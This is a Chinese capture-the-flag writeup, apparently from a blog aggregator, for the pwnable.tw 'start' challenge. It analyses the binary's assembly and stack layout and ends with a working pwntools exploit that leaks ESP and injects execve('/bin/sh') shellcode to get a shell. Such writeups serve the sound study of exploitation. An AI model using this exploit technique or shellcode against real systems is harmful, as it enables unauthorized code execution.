2. 程式人生 > >pwntw start writeup 棧溢位利用自身程式碼

pwntw start writeup 棧溢位利用自身程式碼

阿新 發佈:2018-12-26

這題利用了棧溢位,將返回地址覆蓋為程式本身地址,造成記憶體洩露。

有個坑是如果你用gdb peda自帶的checksec檢查防護措施會發現NX是開啟的,那麼堆疊處的程式碼無法執行,就無法構造棧裡的shellcode,file下
在這裡插入圖片描述
發現程式是靜態連結的,那就無法利用ret2libc。想了半天也不知道怎麼做。就用ubuntu自帶的checksec檢查下發現
在這裡插入圖片描述
根本沒有開啟NX,可能是gdb的除錯環境會影響判斷吧。

拿到題目先執行觀察下,
在這裡插入圖片描述
先顯示了一串字串,然後讓你輸入字串就結束了。

放到IDA裡看一下:

public _start
_start proc near
push    esp
push    offset _exit //這裡的退出函式是作者自己寫的。
xor     eax, eax
xor     ebx, ebx
xor     ecx, ecx
xor     edx, edx
push    3A465443h
push    20656874h
push    20747261h
push    74732073h
push    2774654Ch
mov     ecx, esp        ; addr
mov     dl, 14h         ; len
mov     bl, 1           ; fd
mov     al, 4
int     80h             ; LINUX - sys_write
xor     ebx, ebx
mov     dl, 3Ch
mov     al, 3
int     80h             ; LINUX -
add     esp, 14h
retn
_start endp ; sp-analysis failed

程式本身是用匯編寫的,f5的程式碼可讀性很低,那就直接讀彙編。程式開始處 先push了 ESP,將ESP的值壓棧,然後又push了exit函式的地址,再連續push 5個數,此時堆疊情況如下。
在這裡插入圖片描述
黃色的區域即是連續push的5個數。

mov     ecx, esp        ; addr
mov     dl, 14h         ; len
mov     bl, 1           ; fd
mov     al, 4
int     80h             ; LINUX - sys_write

這段程式碼進行了linux的系統呼叫,linux的系統呼叫都是通過int 0x80來完成的,在int 0x80之前先將引數傳進對應暫存器,以及呼叫的函式的編號傳進來。
這裡的write函式就是將上面的push進堆疊的5個數字以字串形式打印出來,即 Let’s start the CTF: 這段字串。
然後是:

xor     ebx, ebx
mov     dl, 3Ch
mov     al, 3
int     80h             ; LINUX -

這裡IDA沒有顯示是哪個函式,百度了下,得知編號3是read函式。
前面的 xor ebx,ebx 將ebx的值清0,應該是fd,即是標準輸入,從終端輸入。
用gdb除錯下,看看從終端讀取的字串佔據的是哪裡:
在第一個write函式呼叫完成後下一個斷點(從ida可以獲知):
在這裡插入圖片描述
字串的開始是 0xffffd204。
下面一直執行到read函式,輸入字串。
在這裡插入圖片描述
發現輸入的字串也是從 0xffffd204開始的,那就說明read函式從ESP指向的記憶體開始存字串的。
然後是:

add     esp, 14h
retn

將esp值加上0x14,此時ESP指向
在這裡插入圖片描述
再ret就執行exit函式,整個程式執行完畢,ret後ESP指向起始ESP。
程式的流程分析完畢,想要執行shellcode就必須知道每次程式執行時的ESP的值。
在程式執行的第一步就是將ESP壓棧,如果將這個壓棧的ESP值給洩露出來就可以寫出通解。
再看這裡

mov     ecx, esp        ; addr

將ESP的值給ecx,write函式就是將ecx指向的字串打印出來。
而執行完read函式後,ESP恰好指向 起始的ESP,如果將 add of exit 地址覆蓋為 mov ecx, esp ; addr 的地址就可以洩露出 起始ESP的值了,接下來編寫exp

from pwn import *

a=remote('chall.pwnable.tw',10000)

a.recvuntil("Let's start the CTF:")

shellcode="\x31\xc9\x31\xd2\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc0\xb0\x0b\xcd\x80"

payload1='A'*20+p32(0x08048087) # return to func of wrire

a.send(payload1) 

esp=u32(a.recv(4))

payload2='A'*20+p32(esp+20)+shellcode  #注意最後ESP加上了20後再ret
#,所以這裡洩露的ESP也要加20,前面還要有20個垃圾資料填充堆疊,才能將
#shellcode的地址填入正確的位置

a.send(payload2)

a.interactive()

這裡的shellcode是網上隨便複製的。pwntools自帶的生成shellcode太長了。
執行指令碼即可得到shell。
在這裡插入圖片描述

相關推薦

pwntw start writeup 溢位利用自身程式碼

這題利用了棧溢位,將返回地址覆蓋為程式本身地址,造成記憶體洩露。 有個坑是如果你用gdb peda自帶的checksec檢查防護措施會發現NX是開啟的,那麼堆疊處的程式碼無法執行,就無法構造棧裡的shellcode,file下 發現程式是靜態連結的,那就無法利用ret2libc。想了半

寫Java程式碼分別使堆溢位,溢位

原文連結:https://www.cnblogs.com/tv151579/p/3647238.html 轉自:http://fxlzs2000.iteye.com/blog/1786407 轉自:http://my.oschina.net/sdrkyj/blog/143410 前言 primitiv

程式碼實現溢位、堆溢位、永久代溢位、直接記憶體溢位

棧溢位(StackOverflowError) 堆溢位(OutOfMemoryError:Java heap space) 永久代溢位(OutOfMemoryError: PermGen space) 直接記憶體溢位 一、堆溢位 建立物件時如果沒有可以分配的堆記憶體,

cgctf when_did_you_born 溢位簡單利用

拿到題目,先checksec下,看下防護措施: 沒有開啟PIE。 直接放到IDA裡看下: 有些變數名為了方便看,我已經修改過了。圖中箭頭處即是溢位點。 分析下 第一次輸入overflowme,如果等於1926就會退出,但是想要拿到flag,就需要overflowme的值為1926,那就很

溢位漏洞原理及基本利用(ret2addr,ret2arg)

菜雞總結下,方便複習。 ret2addr和ret2arg這兩種利用手法在《黑手緩衝區溢位教程》裡有所提及。這兩種只是基本的利用手法,如果開啟了NX(堆疊程式碼不可執行)或者ASLR就無用武之地了,需要更高階的利用手法,例如ret2libc,ret2plt,和ROP等高階利用手法,這篇筆記

Jarvis OJ- [XMAN]level2/3_x64-Writeup——64位簡單溢位

兩道64位棧溢位,思路和之前的32位溢位基本一致,所以放在一起 在這兩道中體現的32位和64位的主要區別在於函式引數傳遞的方式 在32位程式執行中,函式引數直接壓入棧中     呼叫函式時棧的結構為:呼叫函式地址->函式的返回地址->引數n->引數n-1->···->引數1 在6

如何利用迴圈代替遞迴以防止溢位(譯)

摘要:我們經常會用到遞迴函式,但是如果遞迴深度太大時,往往導致棧溢位。而遞迴深度往往不太容易把握,所以比較安全一點的做法就是:用迴圈代替遞迴。文章最後的原文裡面講了如何用10步實現這個過程,相當精彩。本文翻譯了這篇文章,並加了自己的一點註釋和理解。 目錄  簡介

溢位漏洞的利用和緩解

一直有人說這個時代做滲透太難了, 各個平臺都開始重視安全性, 不像十幾年前, 隨便有個棧溢位就能輕鬆利用. 現在的環境對於新手而言確實不算友好, 上來就需要 面臨著各種邊界保護, 堆疊保護, 地址佈局隨機化. 但現實如此, 與其抱怨, 不如直面現實, 擁抱變化, 對吧? 本文所演示的環境為64位Linux

Jarvis OJ - [XMAN]level1 - Writeup——簡單shellcode利用

adding lan raft 截取 eight .sh close ott 作者 100分的pwn 簡單查看一下,果然還是比較簡單的 放到ida中查看一下,有明顯的溢出函數,並且在函數中打印出了字符串的地址,並且字符串比較長,沒有NX保護 所以我們很容易想到

JMeter-利用自身的代理服務器錄制腳本

接口自動化 jmeter 代理服務器錄制今天重點說一下jmeter如何利用自身的代理服務器錄制腳本1:工作臺下創建代理服務器2:配置代理,選擇錄制控制器3:在Requests FIltering下添加排除模式,配置正則表達式。否則會錄制出很多淩亂的請求。.*\.XXX.*|.*\.XXX.*,根據需要進行增刪

關於 [溢位後jmp esp執行shellcode] 原理分析

原文地址:https://blog.csdn.net/lixiangminghate/article/details/53333710 正常情況下,函式棧分佈圖如下: 即,返回地址被改為一段快取區的地址。當函式執行結束,從棧中取返回地址準備執行時,取到的是shellcode的地址,最終跳進shellc

0day安全:軟體漏洞分析技術 第二章 溢位原理及實踐

_stdcall呼叫約定下,函式呼叫時用到的指令序列大致如下:push 引數3push 引數2push 引數1call 函式地址;a)向棧中壓入當前指令在記憶體中的位置,即儲存儲存返回地址。b)跳轉到所呼叫函式的入口push ebp 儲存舊棧幀的底部mov ebp,esp 設定新棧幀的底部(棧幀切換)sub

Windows 緩衝區溢位利用命令

msfvenom -p windows/shell_bind_tcp -a x86 --platform win -b "\x00" -f c msfvenom -p windows/meterpreter/reverse_tcp LHOST=X.X.X.X LPORT=443 -a x86 --pla

___security_cookie機制,防止溢位

有關security cookie在棧保護上的研究06.10 by flyingkisser這裡主要討論棧,不是堆。首先,security cookie並不是windows系統自帶的保護機制,並不是說一個確實存在溢位漏洞的程式,放到帶security cookie保護的環境中,就不能正常溢位了。那麼,到底是什

溢位----中級ROP

學習資料:https://ctf-wiki.github.io/ctf-wiki/pwn/linux/stackoverflow/medium_rop/ 1.ret2__libc_csu_init 這個主要是爭對64位的程式的,和32位的棧傳參不同的是,在 64 位程式中,函式的前 6 個引

花式溢位技巧----partial overwrite

學習資料:https://ctf-wiki.github.io/ctf-wiki/pwn/linux/stackoverflow/others/#partial-overwrite                 &

花式溢位技巧----Stack smash

學習文獻:https://ctf-wiki.github.io/ctf-wiki/pwn/linux/stackoverflow/others/#stack-smash 以前遇見過一次這種情況,但是是不求甚解的完成了,這次慢慢分析一下原理 棧保護和NX欄位都開啟了,這裡科普一下棧保護,

花式溢位技巧----stack pivoting/frame faking

學習文獻:https://ctf-wiki.github.io/ctf-wiki/pwn/linux/stackoverflow/basic_rop/                   http

溢位----基礎rop

學習文獻:https://ctf-wiki.github.io/ctf-wiki/pwn/linux/stackoverflow/basic_rop/ 1. 棧溢位基本原理就不寫了 列舉一下常見的危險函式: 輸入 gets,直接讀取一行,忽略'\x00'

經典溢位 Easy RM to MP3 Converter

以一個樣本(Easy RM to MP3 Converter)將作為經典棧溢位的講解例項,首先說明此實驗是WIN10環境下復現的; “Easy RM 2 MP3 Converter”是一個音訊格式的轉換工具,年代比較久遠了。在2009年7月17日,packetstormsecurity公開了該軟